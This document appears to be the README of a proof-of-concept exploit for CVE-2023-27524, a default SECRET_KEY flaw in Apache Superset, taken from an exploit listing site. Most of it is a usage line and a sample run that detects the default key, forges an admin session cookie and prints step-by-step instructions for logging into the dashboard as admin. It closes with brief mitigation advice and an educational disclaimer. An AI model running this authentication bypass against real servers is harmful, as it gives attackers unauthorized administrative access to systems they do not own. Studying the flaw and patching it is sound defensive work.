Share
## https://sploitus.com/exploit?id=E93AFBC4-E81F-599F-8EAB-B3621904F348
# CVE-2023-27524: Apache Superset Auth Bypass
Script to check if an Apache Superset server is vulnerable to (CVE-2023-27524) and if it is vulnerable then, forge a session cookie with the `user_id = 1` which is usually the `admin`
user allowing for authentication bypass and gaining access to the dashboard. Currently, there are about 3000 servers world-wide running Apache Superset.


## Usage

```
usage: python3 CVE-2023-27524.py  --url URL 

```

## Basic Example

```
% python3 CVE-2023-27524.py --url http://10.1.221.202:8080   
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `http://10.1.221.202:8080/superset/welcome` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard
```


## Mitigations
Follow the [instructions here](https://superset.apache.org/docs/installation/configuring-superset/) to generate and configure a Flask SECRET_KEY. The `superset` CLI tool can be used to [rotate the SECRET_KEY](https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation) so that existing database connection information is preserved.


## Disclaimer
This POC is created for educational purpose only

## Reference
* https://github.com/horizon3ai/CVE-2023-27524
* https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/